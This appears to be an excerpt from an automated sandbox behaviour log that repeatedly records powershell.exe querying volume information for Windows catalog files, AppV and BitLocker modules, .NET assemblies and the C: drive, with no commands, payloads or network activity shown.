                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
